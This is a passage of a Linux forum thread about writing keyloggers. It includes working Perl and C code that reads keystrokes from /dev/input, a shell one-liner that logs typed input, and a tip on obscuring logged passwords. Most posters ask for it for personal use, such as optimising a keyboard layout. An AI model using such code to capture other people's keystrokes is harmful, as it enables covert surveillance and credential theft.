LinuxQuestions.org
Visit the LQ Articles and Editorials section
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Software
User Name
Password
Linux - Software This forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.

Notices



Reply
 
Search this Thread
Old 06-16-2006, 04:28 AM   #16
Worksman
Member
 
Registered: Sep 2004
Location: Romania
Distribution: Ubuntu, Debian, Arch Linux, Gentoo, Slackware
Posts: 171
Blog Entries: 1

Rep: Reputation: 31
Wink Suggestion: Start a new Thread!


Quote:
Originally Posted by NetBlaster
hi there, i learnt C, but then im kind of still learning now though, im gonna take a step to C++ when i fond a decent book to learn from, and some reasonable resources, then eventually il take a look at python or perl, wanna talk about summat, just ask!
If you guys want to collaborate (since we all are newbies to C/C++ or Python) start a Thread in the Programming Forum called something like "Place for programming newbies to meet and learn together". I sure want to exchange experiences and knowledge with other newbies instead of learning all by myself, seems wrong to me. Hey and maybe experienced programmers will join and give help when needed to 's.
Just don't forget to tell us when you do start the thread.
This thread can still remain usable but it should be moved to the same forum, Programming.
 
Old 06-16-2006, 08:34 AM   #17
DJF5
LQ Newbie
 
Registered: Sep 2005
Location: Heerhugowaard, Netherlands
Distribution: CentOS 4
Posts: 1

Rep: Reputation: Disabled
Always leave your texteditor on... that way you will know what keys are pressed on your system...

just kidding... but do you want to log them physicly? then thats the way. If you would want to log ssh-sessions too, that would be another story...
 
Old 06-16-2006, 11:12 AM   #18
cpbills
LQ Newbie
 
Registered: Jun 2006
Distribution: slackware and/or debian
Posts: 5

Rep: Reputation: 0
here's about where i stopped caring...

simple perl script to read and print out what keys are pressed (based on their codes, not 'A', 'B' etc...)

make sure you set $DEV equal to whatever device evdev creates...
Code:
#!/usr/bin/perl -w

use strict;

my $DEV     = '/dev/input/event1';

open FILE,$DEV;
while (1) {
    my $line = "";
    sysread(FILE,$line,16);
    my @vals = split(//,$line);

    if (ord($vals[10]) != 0) {
        interpret(ord($vals[10]),ord($vals[12]));
    }
}
close FILE;

sub interpret {
    my $keycode = shift;
    my $state   = shift;

    if ($state == 0) {
        print "$keycode up\n";
    }
    if ($state == 1) {
        print "$keycode down\n";
    }
    if ($state == 2) {
        print "$keycode repeat\n";
    }
}
 
Old 06-16-2006, 12:07 PM   #19
apeekaboo
Member
 
Registered: Apr 2003
Location: Stockholm/Sweden
Distribution: Kubuntu, Debian, Slax
Posts: 91

Rep: Reputation: 16
Quote:
Originally Posted by roclok
Is there any way that I can write a script that runs all the time, every time i start computer that will log ever keystroke? If so how do I do this, or must I download a program.
You don't mention if you want to do this for all users or only for yourself.
Using the script command might be sufficient depending on your needs.
 
Old 06-16-2006, 12:22 PM   #20
cpbills
LQ Newbie
 
Registered: Jun 2006
Distribution: slackware and/or debian
Posts: 5

Rep: Reputation: 0
also, the command 'script' may be useful for recording terminal sessions, for the guy who wanted to record what he'd done.

i would also recommend modifying the perl script i posted to log the keycode and key state only, and write an interpreter script, that way your passwords and such aren't logged in an obvious manner...

i.e.

Code:
sub interpret {
    my $keycode = shift;
    my $state = shift;

    open FILE, "/var/log/keylog";
    print FILE "$keycode $state ";
    close FILE;
}

Last edited by cpbills; 06-16-2006 at 12:25 PM.
 
Old 06-16-2006, 03:33 PM   #21
jyoung4
LQ Newbie
 
Registered: Apr 2006
Location: Minneapolis, Minnesota, USA
Posts: 16

Rep: Reputation: 1
Getting back to the original question, a really simple keylogger that will log most of what you type in is:

tee /tmp/keylog | /bin/ksh

You simply start a shell with the tee command sending a copy of everything you type to both the shell and a file. It's not as elegant as the evbug solution discussed above but depending on what you need the output for, it might be enough.
 
Old 06-16-2006, 03:47 PM   #22
evilbohdran
LQ Newbie
 
Registered: Sep 2005
Distribution: Gentoo
Posts: 5

Rep: Reputation: 0
An additional clue, you can use the 'dumpkeys' command to show you what the keycodes map to for your particular keyboard. Perhaps someone can modify the perl code posted to grep thru and translate the codes to real characters.

Quote:
$ dumpkeys
keycode 16 = q
keycode 17 = w
keycode 18 = e
keycode 19 = r
keycode 20 = t
keycode 21 = y
...
 
Old 06-17-2006, 07:23 AM   #23
rob314159
LQ Newbie
 
Registered: May 2006
Distribution: Debian
Posts: 1

Rep: Reputation: 0
Quote:
Originally Posted by j13ett5
/dev/input/event0 seems to be the device to read.

as root the command:

od -tx1 /dev/input/dev0

will give a hex dump in real-time.
every up/down produces 16 bytes of data.
no doubt the details of it are in the kernel documentation somewhere.
Maybe you meant

od -tx1 /dev/input/event0

/rob
 
Old 06-21-2006, 08:16 PM   #24
MBA Whore
Member
 
Registered: May 2006
Location: Kansas City, MO
Distribution: Various: pclos, Debian, Ubuntu, etc . . .
Posts: 580

Rep: Reputation: 30
Linux Key Logger / Root

Correct me if I am wrong, but wouldn't any Linux key logger need root access? That is the way it works with Windows, correct?
 
Old 06-22-2006, 05:05 AM   #25
Worksman
Member
 
Registered: Sep 2004
Location: Romania
Distribution: Ubuntu, Debian, Arch Linux, Gentoo, Slackware
Posts: 171
Blog Entries: 1

Rep: Reputation: 31
Cool

Quote:
Originally Posted by MBA Whore
Correct me if I am wrong, but wouldn't any Linux key logger need root access? That is the way it works with Windows, correct?
The linux philosophy is that everything is a file. That means you need at least read access to the file you *read* the key logs from.
If the file is a character device (in /dev/input/ as discussed earlier) then you need to be either root or in the same group as the file/device (presuming the file has the appropriate read permissions for the group). For eg. if you make a kernel modules that would create /dev/kbdlog then you could make the file 0660 and be of group loggers. Only people in the loggers group have "6" access which is read/write.
On the other hand if you use evdev or evbug you need read access to the logs it writes to (which are handled by syslogd or klogd). Usualy it will write to /var/log/messages so you got it, you need read access to that file. But syslog can be configured so you could route messages from evbug to some other file.

Last edited by Worksman; 06-22-2006 at 05:07 AM.
 
Old 09-04-2006, 05:03 PM   #26
lixy
Member
 
Registered: Apr 2004
Posts: 120

Rep: Reputation: 15
Quote:
Originally Posted by Worksman
Code:
[4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0
[4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 1
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
Interesting thread!
Does anyone know what those [4298922.635000] at the beginning mean? I wonder if that is not the time of the event.
I'm trying to record the exact time of each keypress but not cenvinced as to how reliable such values are. I mean, isn't there an inherent delay when reading keyboard interupts that may vary depending on the availability of the system's resources? If so, that delay will be random and the only way to know the exact time of the keystroke is by some kind of hardware. Any input welcome!

Back to the original topic, there are a couple of keyloggers around for linux. Try lkl. There's also a GPL'ed python code for that.
 
Old 09-04-2006, 10:54 PM   #27
j13ett5
LQ Newbie
 
Registered: Nov 2005
Distribution: debian
Posts: 13

Rep: Reputation: 1
Quote:
Originally Posted by lixy
Interesting thread!
Does anyone know what those [4298922.635000] at the beginning mean? I wonder if that is not the time of the event.
it has the look of a timestamp but I can't figure out the units

Quote:
Originally Posted by lixy
I'm trying to record the exact time of each keypress but not cenvinced as to how reliable such values are. I mean, isn't there an inherent delay when reading keyboard interupts that may vary depending on the availability of the system's resources?
it should be good to within 10ms in most cases and 100ms in almost all cases
(except cripling loads)

Quote:
Originally Posted by lixy
If so, that delay will be random and the only way to know the exact time of the keystroke is by some kind of hardware. Any input welcome!
gettimeofday() reads the hardware clock (timer chip not RTC chip) and tells
you how long since midnight (UTC IIRC) in microseconds (result is precise to 1us)
 
Old 09-06-2006, 11:00 AM   #28
MBA Whore
Member
 
Registered: May 2006
Location: Kansas City, MO
Distribution: Various: pclos, Debian, Ubuntu, etc . . .
Posts: 580

Rep: Reputation: 30
I am not a genius but. . .

I am not a genius but. . .

. . .could anyone tell me WHY anyone would want a key logger on a linux box?

Also, would you have to be running as "root" for the keylogger to work, or not?

Thanks!
 
Old 09-06-2006, 03:24 PM   #29
lixy
Member
 
Registered: Apr 2004
Posts: 120

Rep: Reputation: 15
Quote:
Originally Posted by MBA Whore
. . .could anyone tell me WHY anyone would want a key logger on a linux box?
Because you can!!!

Quote:
Originally Posted by MBA Whore
Also, would you have to be running as "root" for the keylogger to work, or not?
Since you'll probably be wanting to record what would go on in all accounts, yes! Otherwise, the current user's priviliges are enough.
 
Old 03-18-2007, 05:59 PM   #30
phi
LQ Newbie
 
Registered: Jan 2005
Posts: 22

Rep: Reputation: 3
Same in C, but little different

Hello everybody

I was looking for a key-logging facility since weeks. Thanks for all your posts. (It was originally not my post, but the result fits my question best.)

Here I post my C-routine I will use to optimize my .Xmodmap to type faster.
This code is a modification of the previously posted PERL-Code.

Code:
/**
 * Key Logger for counting keystrokes.
 * Together with "dumpkeys" this could be handy to count which 
 * letters 
 *    a) are pressed most
 *    b) can be prssed fastest.
 *
 * I personaly will use this keyloger to find out
 *    a) wich letters I type most
 *    b) which keys I type fastest
 *
 * This statistical results will make it able for me to 
 * generate my own personalized "dvorak" keyboard.
 */

#include <stdio.h>

#define INPUT_QUEUE "/dev/input/event0"
#define OUTPUT_QUEUE "/home/phi/dev/c/keylogger/key.log"
#define EVENT_LEN 16

/* Read the next input line from INPUT_QUEUE
 * which are 16 byte (= sizeof struct input_event {...}).
 */
 /* try the elements of input_event using the following command
  * >od -tx1 /dev/input/event0
  */
void readEventLine(FILE * in, char * data) {
  int i;
  for(i = 0; i <= 15; i++) {
    data[i] = (char) fgetc(in);
  }
}

/*
 * Return the value of a character as unsigned byte
 */
int val(char c) {
  if((int) c < 0) {
    return (int) c + 256;
  } else {
    return (int) c;
  }
}

/* return the time of the input_event in seconds */
long makeSeconds (char * data) {
  long result;
  result = (((val(data[3]) * 256) + val(data[2]) * 256) + val(data[1])) * 256 + val(data[0]);
  return result; 
}

/* return the microsecond part of the time structure.
   Be aware: on other machines than i386 the struct input_event could 
   have a different size!
 */
long makeMicros (char * data) {
  long result;
  result =  (val(data[6]) * 256 + val(data[5])) * 256 + val(data[4]);
  return result; 
}

int main(int argc, char * args[]) {
  FILE * input;
  FILE * output;
  char data[EVENT_LEN];

  input = fopen(INPUT_QUEUE,  "r");
  if(NULL == input) {
    printf("Error opening input");
    return -1;
  }

  output = fopen(OUTPUT_QUEUE, "a");
  if(NULL == output) {
    printf("output not opened");
    return -1;
  }

  while(-1) {
    readEventLine(input, data);
    if(1 == data[8]) // press or release??
      { 
        fprintf(output, "%i.%6.0i", makeSeconds(data), makeMicros(data));
        if(1 == data[12]) { // PRESS
          fprintf(output, "+%i\n", data[10]);
        }
        if(0 == data[12]) {// RELEASE
          fprintf(output, "-%i\n", data[10]);
        }
      }

    fflush(output);
  }

  fclose(input);
  fclose(output);
}
Has anyone a good idea (like dumpkeys) to translate the above keycodes to the pressed letters and symbols?
The problem will be to store the state of the Meta keys (control, alt, shift, ...).

Another (little related) problem is to start the key logger only when I am logged in. I don't want other users (I my case only my wife working in her account) to spoil my great optimizing 10-Finger project. But this is probably a Gnome question.

Last edited by phi; 03-18-2007 at 06:02 PM.
 
  


Reply

Tags
keylogger


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
keylogger? |2ainman Linux - Security 4 08-21-2013 04:48 AM
anti keylogger lini Linux - Security 4 01-07-2006 06:56 AM
keylogger in java? Laptop2250 Programming 2 01-08-2005 06:27 PM
help with lkl keylogger br0k3n Linux - Software 0 07-22-2004 05:55 PM


All times are GMT -5. The time now is 09:19 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration